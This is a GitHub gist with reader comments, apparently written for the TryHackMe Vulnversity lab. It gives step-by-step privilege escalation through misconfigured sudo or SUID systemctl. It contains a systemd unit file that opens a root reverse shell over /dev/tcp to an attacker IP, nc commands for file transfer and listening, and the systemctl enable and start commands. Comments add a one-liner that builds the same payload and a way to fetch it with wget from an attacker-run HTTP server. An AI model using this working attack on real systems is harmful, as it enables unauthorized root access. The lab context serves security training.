Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Privilege Escalation: Systemctl (Misconfigured Permissions — sudo/SUID)

For better reading experience

https://alvinsmith.gitbook.io/progressive-oscp/untitled/vulnversity-privilege-escalation

0. Prepare your payload root.service

[Unit]
Description=roooooooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'

[Install]
WantedBy=multi-user.target

1. Find a files/directories that writable

find / -type f -maxdepth 2 -writable

or

find / -type d -maxdepth 2 -writable

2. Transfter the payload(Or just write file there using vi)

Init the target listening the port
nc -vl 44444 > root.service
Send file to traget
nc -n TargetIP 44444 < root.service

3. Start listening on the 9999

nc -lvnp 9999

4. Execute the payload(assume the file is under /dev/shm)

/bin/systemctl enable /dev/shm/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /dev/shm/root.service
Created symlink from /etc/systemd/system/root.service -> /dev/shm/root.service
/bin/systemctl start root

5. The nc listening on 9999 would give you the root

Expand Knowlege

https://gtfobins.github.io/gtfobins/systemctl/#suid

https://stackoverflow.com/questions/2491985/find-all-writable-files-in-the-current-directory

https://www.maketecheasier.com/netcat-transfer-files-between-linux-computers/

https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49

@juxenova

This comment has been minimized.

Copy link

@juxenova juxenova commented Jan 12, 2021

perfect

@njmulsqb

This comment has been minimized.

Copy link

@njmulsqb njmulsqb commented Feb 2, 2021

Don't you think that find command should be find -type d instead of find -type f?

@A1vinSmith

This comment has been minimized.

Copy link
Owner Author

@A1vinSmith A1vinSmith commented Feb 2, 2021

Don't you think that find command should be find -type d instead of find -type f?

Yeah, couldn’t remember it’s for files or directory. Would be type d if looking for latter one. Thank you for pointing out.

@danielmartins-br

This comment has been minimized.

Copy link

@danielmartins-br danielmartins-br commented Apr 3, 2021

Vulnversity :)

@sakhan007

This comment has been minimized.

Copy link

@sakhan007 sakhan007 commented Jun 6, 2021

It's better to use find to find all writable directories in the system and hence use:
find / -type d -maxdepth 2 -writable

@carlvaneijk

This comment has been minimized.

Copy link

@carlvaneijk carlvaneijk commented Jun 16, 2021

froget about all that file transferring

START LISTENER (9999)

find / -type d -maxdepth 2 -writable

-CD to writable dir-

-One liner -
RATME="'bash -i >& /dev/tcp/yourIPHere/9999 0>&1'" echo '[Unit]\nDescription=rooted-Oneliner\n\n[Service]\nType=simple\nUser=root\nExecStart=/bin/bash -c '$RATME'\n\n[Install]\nWantedBy=multi-user.target' >root.service

-Start-
/bin/systemctl enable /whatever-writable-dir/root.service
/bin/systemctl start root

@adibdz

This comment has been minimized.

Copy link

@adibdz adibdz commented Sep 9, 2021

Just finished thm-vulnversity. I just found out that nc can transfer file. Before, I write the payload manually on victim machine with very slowly and patienly.

@hoangquandn97

This comment has been minimized.

Copy link

@hoangquandn97 hoangquandn97 commented Oct 14, 2021

Who is here for the vulnervisity room?

@rochellelewis

This comment has been minimized.

Copy link

@rochellelewis rochellelewis commented Oct 20, 2021

Easy method to get the root.service file onto the compromised server if you already have a nc reverse shell running (ahem, Vulnversity room) - serve it from your attacker machine using python http.server, then wget it in the reverse shell you already got.


Find a writable directory on the compromised server by running:
find / -type d -maxdepth 2 -writable
cd into it

Run a python http.server on your attacker machine in the directory that has your root.service file:
python3 -m http.server 8000

Go back to your nc reverse shell, and wget that sucker from your attacker machine. Check ifconfig or hostname -I for your attacker machine IP address.
wget http://YOUR-IP:8000/root.service
(for Vulnversity, I used the Internal Virtual IP)

Voila!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment